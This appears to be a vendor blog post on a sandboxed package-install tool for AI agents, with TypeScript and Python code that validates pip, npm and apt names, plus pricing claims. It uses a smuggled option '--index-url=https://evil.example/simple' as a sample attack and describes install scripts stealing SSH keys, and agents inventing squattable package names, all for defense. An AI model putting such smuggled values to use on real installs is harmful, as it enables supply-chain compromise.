# Let your agent install its own tools: apt, pip and npm in a sandbox Give the agent an install tool that checks each name, uses the right package manager, and runs in a sandbox that can reach only registries. **Runtime (withruntime.com) gives every agent a Linux machine of its own where `sudo apt-get install` simply works, and root inside it still cannot change its network rules, CPU or memory, which the host enforces from outside; a new one is running 102 ms after the request on Runtime's servers.** An agent that cannot install a library either gives up or writes a worse version of it by hand. An agent that installs whatever it likes on your laptop is a supply-chain incident waiting for a typo. This post builds the middle path: a tool that lets the model add the packages it needs, refuses the ones it should not, and teaches you which ones belong in your base image. ## Why give the agent an install tool instead of a shell? Because a named tool can be checked and a shell command cannot. An agent with `run` can already type `pip install`, but then the install is one string among hundreds, and nothing distinguishes `pip install pandas` from `pip install --index-url https://evil.example/simple pandas`. A separate `install(ecosystem, names)` tool gives you one place to: - validate every name, so no option or URL rides along as a "package"; - pick the right command and flags for each package manager; - refuse packages that do not exist or appeared last week; - record what was installed, outside the sandbox, for the image you build later. Keep `run` for everything else. Most models use a dedicated install tool readily once it exists, especially if its description says it is the only way packages get installed. ## What can go wrong when an agent installs packages? Three things, in order of how often they happen: | Risk | What it looks like | The defense | | ---------------------------- | ------------------------------------------------------------------------- | ----------------------------------------------------------- | | A package that never existed | The model invents `pandas-excel-tools`; someone registers that name | Check the name exists and is not brand new | | Code that runs at install | A package's install script reads `~/.ssh` or env variables and posts them | Nothing worth stealing in the sandbox, and a narrow network | | An option posing as a name | `--index-url=https://evil.example` installs from someone else's index | A strict name pattern and an argument list, no shell | The first row is the one specific to agents. Models suggest plausible package names that do not exist, often the same invented names across many runs, and attackers have started registering them. The check is cheap: ask the registry when the name was first published, before the sandbox ever downloads it. The second row is why the install runs in a sandbox and not on your machine. An install script that runs in a fresh Firecracker microVM with no keys in it and a network that reaches only package registries has nothing to take and nowhere to send it ([restrict agent internet access](/blog/restrict-agent-internet-access)). ## What does the install tool look like? One function per ecosystem rule, all behind one entry point. Names are checked against each registry's own naming rules, commands are passed as argument lists so no shell ever reads the model's text, and every attempt is recorded on your side: ```ts import { Sandbox } from "withruntime"; type Ecosystem = "pip" | "npm" | "apt"; const NAME: Record = { pip: /^[A-Za-z0-9][A-Za-z0-9._-]{0,99}(==[A-Za-z0-9.!+-]{1,40})?$/, npm: /^(@[a-z0-9][a-z0-9._-]*\/)?[a-z0-9][a-z0-9._-]{0,99}(@[0-9A-Za-z.^~-]{1,40})?$/, apt: /^[a-z0-9][a-z0-9+.-]{1,99}$/, }; const COMMAND: Record = { pip: ["pip", "install", "--quiet", "--no-input"], npm: ["npm", "install", "--no-fund", "--no-audit", "--ignore-scripts"], apt: ["sudo", "-E", "apt-get", "install", "-y", "-q", "--no-install-recommends"], }; export const installLog: { ecosystem: Ecosystem; names: string[]; ok: boolean; ms: number }[] = []; export async function install( sbx: Sandbox, ecosystem: Ecosystem, names: string[], ): Promise { if (!(ecosystem in NAME)) return `refused: ecosystem must be pip, npm or apt`; const bad = names.filter((name) => !NAME[ecosystem].test(name)); if (names.length === 0 || names.length > 10 || bad.length) return `refused: give 1 to 10 ${ecosystem} package names${bad.length ? `; not valid: ${bad.join(", ")}` : ""}`; const started = Date.now(); const opts = { cwd: "/workspace", timeoutMs: 600_000, env: { DEBIAN_FRONTEND: "noninteractive" }, }; if (ecosystem === "apt") await sbx.exec(["sudo", "-E", "apt-get", "update", "-q"], opts); const r = await sbx.exec([...COMMAND[ecosystem], ...names], opts); installLog.push({ ecosystem, names, ok: r.exitCode === 0, ms: Date.now() - started }); return r.exitCode === 0 ? `installed ${names.join(", ")}` : `install failed (exit ${r.exitCode}):\n${(r.stdout + r.stderr).slice(-3000)}`; } await using sbx = await Sandbox.create({ labels: { tools: "install-demo" } }); console.log(await install(sbx, "pip", ["httpx==0.28.1", "rich"])); console.log(await install(sbx, "pip", ["--index-url=https://evil.example/simple"])); console.log(installLog); ``` ```python import re import time from withruntime import Sandbox NAME = { "pip": re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,99}(==[A-Za-z0-9.!+-]{1,40})?$"), "npm": re.compile(r"^(@[a-z0-9][a-z0-9._-]*/)?[a-z0-9][a-z0-9._-]{0,99}(@[0-9A-Za-z.^~-]{1,40})?$"), "apt": re.compile(r"^[a-z0-9][a-z0-9+.-]{1,99}$"), } COMMAND = { "pip": ["pip", "install", "--quiet", "--no-input"], "npm": ["npm", "install", "--no-fund", "--no-audit", "--ignore-scripts"], "apt": ["sudo", "-E", "apt-get", "install", "-y", "-q", "--no-install-recommends"], } install_log: list[dict] = [] def install(sbx, ecosystem: str, names: list[str]) -> str: if ecosystem not in NAME: return "refused: ecosystem must be pip, npm or apt" bad = [n for n in names if not NAME[ecosystem].match(n)] if not names or len(names) > 10 or bad: return f"refused: give 1 to 10 {ecosystem} package names" + (f"; not valid: {', '.join(bad)}" if bad else "") started = time.monotonic() opts = {"cwd": "/workspace", "timeout_ms": 600_000, "env": {"DEBIAN_FRONTEND": "noninteractive"}} if ecosystem == "apt": sbx.exec(["sudo", "-E", "apt-get", "update", "-q"], **opts) r = sbx.exec([*COMMAND[ecosystem], *names], **opts) install_log.append({"ecosystem": ecosystem, "names": names, "ok": r.exit_code == 0, "ms": round((time.monotonic() - started) * 1000)}) if r.exit_code == 0: return f"installed {', '.join(names)}" return f"install failed (exit {r.exit_code}):\n{(r.stdout + r.stderr)[-3000:]}" with Sandbox.create(labels={"tools": "install-demo"}) as sbx: print(install(sbx, "pip", ["httpx==0.28.1", "rich"])) print(install(sbx, "pip", ["--index-url=https://evil.example/simple"])) print(install_log) ``` The second call in each sample is the attack from the table, and the name pattern refuses it before anything runs. Note what the patterns leave out on purpose: URLs, paths, `git+` sources and anything starting with a dash. If an agent genuinely needs a package from a Git repository, that is a decision for a person, not a tool call. `--ignore-scripts` on npm stops install scripts from running at all. A few packages need theirs, typically ones that download a native binary; when one fails without its script, add it to an allow list of names that may run scripts, rather than turning scripts back on for everything. ## Should a package go into the project or only the machine? It depends on who needs it after the task. A tool the agent uses for itself, such as `ripgrep` to search or `rich` to print a table, belongs on the machine and nowhere else. A library the code the agent writes will import belongs in the project's manifest, so the next person and the CI run get it too. Make that a second tool, or a flag on the first. For the project case, run the project's own command, `uv add` or `npm install --save`, so the change lands in `pyproject.toml` or `package.json` and its lockfile, and shows up in the diff a reviewer reads. An agent that only `pip install`s a dependency leaves a change that works in its sandbox and fails everywhere else, which is the first thing a [test gate](/blog/test-gate-for-agent-written-code) catches. ## How do you catch a package name the model made up? Ask the registry before installing, from your own code. Both PyPI and npm publish when a package first appeared. A name that does not exist is refused with a message the model can act on, and one first published in the last few weeks goes to a person: ```ts check // Run in your orchestrator, before install(): does the name exist, and since when? export async function firstPublished(ecosystem: "pip" | "npm", name: string): Promise { const bare = name.split(/==|@(?=[^@]*$)/)[0]!; if (ecosystem === "pip") { const res = await fetch(`https://pypi.org/pypi/${encodeURIComponent(bare)}/json`); if (!res.ok) return null; const { releases } = (await res.json()) as { releases: Record; }; const times = Object.values(releases) .flat() .map((f) => Date.parse(f.upload_time_iso_8601)); return times.length ? new Date(Math.min(...times)) : null; } const res = await fetch(`https://registry.npmjs.org/${bare.replace("/", "%2F")}`); if (!res.ok) return null; const { time } = (await res.json()) as { time?: { created?: string } }; return time?.created ? new Date(time.created) : null; } ``` Thirty days is a reasonable line for "too new to trust without a look". It catches a squatted invented name, and almost no task an agent does depends on a package younger than that. ## Which hosts does the sandbox need to reach? Only the registries for the ecosystems you allow. Set the list when you create the sandbox: `pypi.org` and `files.pythonhosted.org` for pip, `registry.npmjs.org` for npm. For apt, read the hosts from the image itself with `grep -h '^URIs' /etc/apt/sources.list.d/*.sources` and allow those. The rules apply to root inside the sandbox too, so `sudo` does not get around them ([allow only some hosts](/how-to/allow-only-some-hosts)). Without credit, a sandbox reaches ports 80 and 443 only, which covers all three package managers. ## How do you turn what agents install into a better base image? Count the install log across runs, and bake the regulars into a custom image. After a week, the log answers a question no one could answer up front: which packages do your agents reach for on almost every task? Those belong in the image, so the next task starts with them and spends no time or tokens installing: ```ts check import { Runtime } from "withruntime"; // Packages installed successfully in at least 1 run in 5, from your install logs. const regulars = { pip: ["httpx", "rich", "pyarrow"], apt: ["ffmpeg", "poppler-utils"] }; const runtime = new Runtime(); const image = await runtime.images.build( { name: "agent-base", recipe: { pip: regulars.pip, apt: regulars.apt } }, { onLog: (line) => console.log(line.text) }, ); console.log("next tasks start from", image.name); ``` Building an image is free, and a stored image costs $0.08 per GB a month ([custom images](/docs/images)). Rebuild it monthly from the latest log, and pin versions in the recipe when a package's new release breaks your tasks. ## What does an install cost? The CPU it uses and nothing else. CPU is billed on use at $0.025 per vCPU-hour, so a `pip install` that keeps one vCPU busy for 40 seconds costs $0.0003 of CPU. Downloads are inbound traffic, which is free ([pricing](/pricing)). The real cost of installing on every task is time: the minute an agent spends installing is a minute your user waits, which is why the image step above matters more than the price. ## In short - Give agents a dedicated `install` tool and keep package installs out of free-form shell commands. - Validate names against each registry's rules and pass argument lists, so no option or URL can pass as a package. - Check the registry for names the model invented or that appeared recently, before the sandbox downloads anything. - Run installs in a sandbox with no secrets and a network that reaches only the registries, then bake the packages agents always need into an image. ## Run it on Runtime Runtime costs 42% to 88% less than fourteen other sandbox providers for an agent that mostly waits on a model ([compare costs](/how-to/compare-your-costs)). Every Runtime sandbox is a Firecracker microVM where the agent is root, with network rules the host enforces and installs billed only for the CPU they use. [Sign in at withruntime.com](/sign-in) and give your agent the `install` tool above.